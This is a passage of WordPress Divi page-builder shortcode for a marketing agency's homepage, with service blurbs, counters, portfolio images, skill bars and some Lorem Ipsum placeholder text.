border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#d4b068\" background_color_gradient_start_position=\"65%\" background_color_gradient_end_position=\"65%\" custom_padding=\"|||\" hover_enabled=\"0\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=f47r43eO6BU\" image_src=\"//i.ytimg.com/vi/f47r43eO6BU/hqdefault.jpg\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" hover_enabled=\"0\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Fun Fact Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"60px||110px|\" hover_enabled=\"0\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<h2><span style=\"color: #ffffff;\">Generating New Ideas. Solving real Problems</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>Ideas are relevant if it has power to solve the real problem at hand. We are always keen on working practical ideas in the realtime business atmosphere.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_4,1_4,1_4,1_4\" admin_label=\"Fun Fact\" _builder_version=\"3.25\" custom_margin=\"|||\" custom_padding=\"40px||40px|\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"10%\"][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Projects\" number=\"350\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Satisfied Clients\" number=\"62\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Ongoing Projects\" number=\"16\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_number_counter title=\"Cups Of Coffee\" number=\"906\" percent_sign=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|\" title_text_color=\"#353740\" number_font=\"Montserrat|on|||\" number_text_color=\"#ffffff\" number_font_size=\"60px\" number_line_height=\"90px\" animation_style=\"zoom\" animation_delay=\"300ms\" hover_enabled=\"0\"][/et_pb_number_counter][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Feature Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"109px||5px|||\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"4\" admin_label=\"Feature\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"86%\" width_tablet=\"80%\" width_phone=\"\" width_last_edited=\"on|desktop\" max_width=\"86%\" max_width_tablet=\"80%\" max_width_phone=\"\" max_width_last_edited=\"on|desktop\" custom_padding=\"40px||40px|\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/Why-we.jpg\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" custom_margin=\"||40px|||\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"8%\" animation_starting_opacity=\"100%\" hover_enabled=\"0\" alt=\"Why We\" title_text=\"Why-we\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"7%||7%|\" hover_enabled=\"0\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\" custom_margin=\"-86px|||||\"]<h2><span>Why choose us?</span></h2>\n[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"||31px|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\" locked=\"off\"]<p><span>WhatTheHell? is not some advertising, digital and design agency. An irreverent ideas farm seems more like it. Always eager to work with people who are looking to do brilliant things to their brands.</span></p>\n<p><span>We help in realizing brand aspirations through our in-depth research &amp; analytics and translate them into irreverent creative ideas. We always remember that there’s more to marketing communication than top-funnel awareness building through BTL, ATL, Outdoor, or Digital Media Publishing.</span></p>\n[/et_pb_text][et_pb_button button_url=\"#\" button_text=\"Learn More\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Latest Work Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"110px||5px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Latest Work</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"0px\" admin_label=\"Work Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_padding=\"0px|5%|0px|5%\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_top__hover=\"0px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800-w.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design\" title_text=\"packaging design by what the hell\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/217x434.jpg\" url=\"#\" force_fullwidth=\"on\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" title_text=\"217x434\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" _builder_version=\"3.25\" custom_padding=\"0px||0px|\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Creative graphic designing\" title_text=\"Creative graphic designing\"][/et_pb_image][/et_pb_column_inner][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/800x800..1.jpg\" url=\"#\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"flip\" animation_intensity_flip=\"30%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"0px\" box_shadow_spread=\"10px\" box_shadow_color=\"#f7f7f7\" alt=\"Packaging Design creative agency\" title_text=\"packaging design creative advertising agency\"][/et_pb_image][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Button Section\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" custom_padding=\"0px||90px|\"][et_pb_row _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"See More\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#747d88\" button_border_width=\"4px\" button_border_color=\"#747d88\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#747d88\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Skill Section\" _builder_version=\"3.22\" custom_padding=\"110px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Our Skills</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p>We have a dedicated team to build new tools and technique, to complete the day today repetitive work with precision.</p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Skill\" _builder_version=\"3.25\" custom_padding=\"20px||10px|\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"flip\" animation_intensity_flip=\"20%\" hover_enabled=\"0\"]<p>We have a dedicated inhouse talent to handle the various aspects of communication and digital advertising. Be it creative writing or eye catching graphic design. Our young and energetic team bring best and creative execution to all the ideas created.</p>\n[/et_pb_text][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_counters bar_bg_color=\"#d4b068\" use_percentages=\"off\" _builder_version=\"4.5.2\" title_font=\"Montserrat|||on|||||\" title_text_color=\"#353740\" title_font_size=\"12px\" title_letter_spacing=\"1px\" title_line_height=\"2em\" percent_font_size=\"1px\" custom_padding=\"|||\" animation_style=\"fold\" animation_direction=\"left\" animation_intensity_fold=\"30%\" hover_enabled=\"0\"][et_pb_counter percent=\"90\" _builder_version=\"3.0.83\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]Branding - 90%\r[/et_pb_counter][et_pb_counter percent=\"77\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nLead/Sales Generation Campaign - 77%\n\n[/et_pb_counter][et_pb_counter percent=\"85%\" _builder_version=\"4.5.2\" title_font=\"||||||||\" percent_font=\"||||\" background_color=\"#ececee\" custom_margin=\"||35px|\" custom_padding=\"|||\" hover_enabled=\"0\" background_enable_color_default=\"on\" parallax_default=\"off\" parallax_method_default=\"on\" bar_background_color_default=\"#d4b068\" use_percentages=\"off\" allow_player_pause_default=\"off\"]\n\nDigital Advertising - 85%\n\n[/et_pb_counter][/et_pb_counters][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Gradient Background Color Section\" _builder_version=\"3.22\" background_color_gradient_direction=\"90deg\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/08/background-split-03-1.jpg\" custom_margin=\"||78px|\" custom_margin_tablet=\"||0px|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%||0px|\"][et_pb_row _builder_version=\"3.25\" custom_padding=\"0px|0px|0px|0px\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/MB-purefront-02.png\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"3.23\" custom_margin=\"||-56px|\" custom_margin_tablet=\"||10%|\" custom_margin_phone=\"\" custom_margin_last_edited=\"on|phone\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"left\" animation_duration=\"1500ms\" animation_intensity_slide=\"10%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"3.22\" custom_margin=\"40px||50px|\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_text_color=\"#747d88\" text_font_size=\"24px\" text_line_height=\"1.8em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry\'s standard dummy text ever.\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" make_equal=\"on\" use_custom_gutter=\"on\" gutter_width=\"1\" specialty=\"on\" padding_top_1=\"140px\" padding_top_2=\"0px\" padding_left_1=\"10%\" admin_label=\"Feature Section\" module_class=\" et_pb_specialty_fullwidth\" _builder_version=\"3.22\" background_color=\"#f7f7f7\" inner_width=\"100%\" inner_width_tablet=\"100%\" inner_width_phone=\"\" inner_width_last_edited=\"on|desktop\" inner_max_width=\"100%\" inner_max_width_tablet=\"100%\" inner_max_width_phone=\"\" inner_max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"0px|||\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"100px\" box_shadow_color=\"#ffffff\" make_fullwidth=\"on\"][et_pb_column type=\"1_2\" specialty_columns=\"2\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_left__hover=\"10%\" padding_top__hover=\"140px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_row_inner use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Feature Titile\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"||10px|\"][et_pb_column_inner saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" max_width=\"700px\" module_alignment=\"left\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" locked=\"off\"]<h2>Award winning Design</h2>[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"||20px|\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" locked=\"off\"]<p><span>Lorem ipsum dolor sit amet, consectetur adipiscing elit. Maecenas metus sapien, tempus nec lectus vitae, varius porttitor turpis. Ut sit amet tincidunt nulla, nec ultrices est. Aliquam sollicitudin tempor dui, ac accumsan metus vulputate sit amet. Donec placerat rutrum tellus et.</span></p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][et_pb_row_inner column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" make_equal=\"on\" admin_label=\"Features\" _builder_version=\"3.25\" max_width=\"75%\" custom_margin=\"|||\" custom_padding=\"|||\"][et_pb_column_inner type=\"1_2\" saved_specialty_column_type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Product\" use_icon=\"on\" font_icon=\"%%65%%\" icon_color=\"#fcd21d\" use_icon_font_size=\"on\" icon_font_size=\"48px\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" 